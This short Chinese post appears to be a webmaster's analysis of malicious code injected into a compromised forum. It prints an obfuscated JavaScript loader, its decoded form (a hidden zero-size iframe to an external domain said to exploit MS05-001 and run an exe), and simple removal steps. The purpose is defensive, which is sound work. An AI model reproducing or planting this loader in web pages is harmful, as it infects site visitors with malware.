網頁有一段被加密了的代碼:
語法:
var HtmlStrings=["=jgsbnf!tsd>iuuq;00xxx/tivbjee/dpn0tdsjqu0bedpvou/ep@to>be112!xj","eui>1!ifjhiu>1>=0jgsbnf>"];function jspsw(st){var varS;varS="";var i; for(var a=0;a<st.length;a++){i = st.charCodeAt(a);if (i==1)varS=varS+String.fromCharCode('"'.charCodeAt()-1); else if(i==2) { a++;varS+=String.fromCharCode(st.charCodeAt(a)); } else varS+=String.fromCharCode(i-1);} return varS;}var thejsnum=2;function thejsS(){for(i=0;i<thejsnum;i++)document.write(jspsw(HtmlStrings[i]));}thejsS();
代碼解密後:
語法:
<BODY><IFRAME src="http://www.shuaidd.com/script/adcount.do?sn=ad001" width=0 height=0></IFRAME></BODY>
上面的鏈接會連接到一個利用MS05-001漏洞運行exe文件的網頁,這也是爲什麽會出現幫助窗口的原因.
清除網頁中惡意代碼很簡單,搜索"var HtmlStrings=",刪除相關代碼.
但最重要的是馬上找出論壇被入侵的原因.
書籤